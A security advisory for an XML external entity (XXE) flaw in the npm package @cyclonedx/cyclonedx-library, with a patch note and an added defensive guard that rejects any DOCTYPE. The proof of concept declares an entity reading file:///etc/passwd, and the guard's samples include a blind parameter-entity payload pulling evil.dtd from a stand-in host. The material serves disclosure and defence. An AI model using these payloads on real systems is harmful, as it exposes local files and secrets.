Security Headlines

GHSA-38gf-rh2w-gmj7: @cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Impact

XML external entity (XXE) injection is possible when the provided XML validator is run on arbitrary, untrusted input: a DOCTYPE in the input is honoured, so an attacker-supplied external entity declaration is processed by the validator's XML parser.

POC

const {
  Spec: { Version },
  Validation: { XmlValidator }
} = require('@cyclonedx/cyclonedx-library');

const version = Version.v1dot5;
const validator = new XmlValidator(version);
const input = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components>
    <component type="library">
      <name>testing</name>
      <version>1.337</version>
      <licenses>
        <license>
          <id>&xxe;</id><!-- << XML external entity (XXE) injection -->
        </license>
      </licenses>
    </component>
  </components>
</bom>`;

// Validating this forged input may lead to unintended behaviour, because the
// XML external entity declaration is honoured rather than rejected: when &xxe;
// is expanded, the parser may resolve the SYSTEM identifier (file:///etc/passwd).
validator.validate(input).then(ve => {
  console.error('validation error', ve);
});

Patches

This issue was fixed in @cyclonedx/[email protected].

Workarounds

Do not run the provided XML validator on untrusted inputs.
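The workaround above can be enforced mechanically for inputs that still have to be processed. The following is an added example, not code from @cyclonedx/cyclonedx-library or its maintainers: a pre-validation guard that refuses any XML document carrying a DOCTYPE before it reaches an XML validator or parser. A CycloneDX BOM never needs a DTD, so rejecting the whole DOCTYPE (not only SYSTEM entities) is the simplest safe policy; it also catches parameter-entity (blind) XXE and an external DTD subset, which the PoC on this page does not show. The function names (inspectDtd, assertSafeXml, guardedValidate) and the sample documents are this example's own assumptions, not library API.

```javascript
// Added example, not code from @cyclonedx/cyclonedx-library. Function names
// (inspectDtd, assertSafeXml, guardedValidate) are this example's own.

// Remove comments and CDATA sections so a "<!DOCTYPE" inside them is not
// misread as a real declaration.
function stripCommentsAndCdata(xml) {
  return xml
    .replace(/<!--[\s\S]*?-->/g, '')
    .replace(/<!\[CDATA\[[\s\S]*?\]\]>/g, '');
}

// Report DTD usage: whether a DOCTYPE is present, whether it points at an
// external subset (SYSTEM/PUBLIC identifier), and every ENTITY declared in
// the internal subset, classified as internal, external or parameter.
function inspectDtd(xml) {
  const text = stripCommentsAndCdata(xml);
  const doctype = /<!DOCTYPE\s+([^\s\[>]+)([^\[>]*)(?:\[([\s\S]*?)\])?\s*>/i.exec(text);
  if (!doctype) {
    return { hasDoctype: false, rootName: null, externalSubset: false, entities: [] };
  }
  const [, rootName, externalId, internalSubset = ''] = doctype;
  const externalSubset = /\b(SYSTEM|PUBLIC)\b/i.test(externalId);

  // Groups: 1 = "%" (parameter entity), 2 = name, 3/4 = SYSTEM literal,
  // 5/6 = PUBLIC system literal; a bare quoted value is an internal entity.
  const entityRe = /<!ENTITY\s+(%\s+)?(\S+)\s+(?:SYSTEM\s+(?:"([^"]*)"|'([^']*)')|PUBLIC\s+(?:"[^"]*"|'[^']*')\s+(?:"([^"]*)"|'([^']*)')|(?:"[^"]*"|'[^']*'))\s*>/gi;
  const entities = [];
  let m;
  while ((m = entityRe.exec(internalSubset)) !== null) {
    const found = [m[3], m[4], m[5], m[6]].find(v => v !== undefined);
    const uri = found === undefined ? null : found;
    entities.push({
      name: m[2],
      kind: m[1] ? 'parameter' : (uri !== null ? 'external' : 'internal'),
      uri,
    });
  }
  return { hasDoctype: true, rootName, externalSubset, entities };
}

// Throw on any DOCTYPE; otherwise return the input unchanged so the call can
// be chained in front of the validator.
function assertSafeXml(xml) {
  const report = inspectDtd(xml);
  if (report.hasDoctype) {
    const detail = report.entities
      .map(e => `${e.kind} entity "${e.name}"${e.uri ? ` -> ${e.uri}` : ''}`)
      .join(', ') || 'no entities';
    throw new Error(`refusing XML with a DOCTYPE (root "${report.rootName}", ` +
      `external subset: ${report.externalSubset}, ${detail})`);
  }
  return xml;
}

// Wrapper for whatever validator you already use, e.g.
//   guardedValidate(input, x => validator.validate(x))
// The guard runs first, so a forged DOCTYPE never reaches the XML parser.
async function guardedValidate(xml, validate) {
  return validate(assertSafeXml(xml));
}

// Constructed sample inputs (not taken from any real BOM): the advisory's PoC
// shape, a blind parameter-entity variant, an external subset, a DOCTYPE
// hidden in a comment, and a clean BOM.
const XXE_BOM = `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE poc [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components><component type="library"><name>testing</name><version>1.337</version>
    <licenses><license><id>&xxe;</id></license></licenses></component></components>
</bom>`;
const BLIND_XXE_BOM = `<?xml version="1.0"?>
<!DOCTYPE bom [
  <!ENTITY % ext SYSTEM "http://example.invalid/evil.dtd">
  %ext;
]>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>`;
const EXTERNAL_SUBSET_BOM = `<?xml version="1.0"?>
<!DOCTYPE bom SYSTEM "http://example.invalid/bom.dtd">
<bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>`;
const COMMENTED_DOCTYPE_BOM = `<?xml version="1.0"?>
<!-- <!DOCTYPE x [<!ENTITY a "b">]> -->
<bom xmlns="http://cyclonedx.org/schema/bom/1.5"/>`;
const CLEAN_BOM = `<?xml version="1.0" encoding="UTF-8"?>
<bom xmlns="http://cyclonedx.org/schema/bom/1.5">
  <components><component type="library"><name>testing</name><version>1.337</version></component></components>
</bom>`;

// Decision for each sample, usable as a quick self-check.
function classifySamples() {
  const samples = { XXE_BOM, BLIND_XXE_BOM, EXTERNAL_SUBSET_BOM, COMMENTED_DOCTYPE_BOM, CLEAN_BOM };
  const out = {};
  for (const [label, xml] of Object.entries(samples)) {
    try { assertSafeXml(xml); out[label] = 'accepted'; }
    catch (err) { out[label] = 'rejected: ' + err.message; }
  }
  return out;
}

console.log(classifySamples());
```

This guard is defence in depth, not a substitute for the fix in Patches: upgrade the library, and make sure the XML parser behind any validator you run on untrusted data is configured not to resolve external entities or load external DTDs. The textual check is deliberately strict (any DOCTYPE is refused) because BOM documents have no legitimate use for one, and a lenient scan that only looks for SYSTEM would miss parameter entities and entity-expansion bombs.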

References

  • Source: ghsa
  • GitHub Advisory Database (GitHub Reviewed)
  • CVE-2024-34345

@cyclonedx/cyclonedx-library Improper Restriction of XML External Entity Reference vulnerability

Package

npm @cyclonedx/cyclonedx-library (npm)

Affected versions

= 6.7.0


References

  • CycloneDX/cyclonedx-javascript-library#1063 (the change via which the issue was introduced)
  • GHSA-38gf-rh2w-gmj7
  • CycloneDX/cyclonedx-javascript-library@5e5e1e0

Published to the GitHub Advisory Database

May 8, 2024
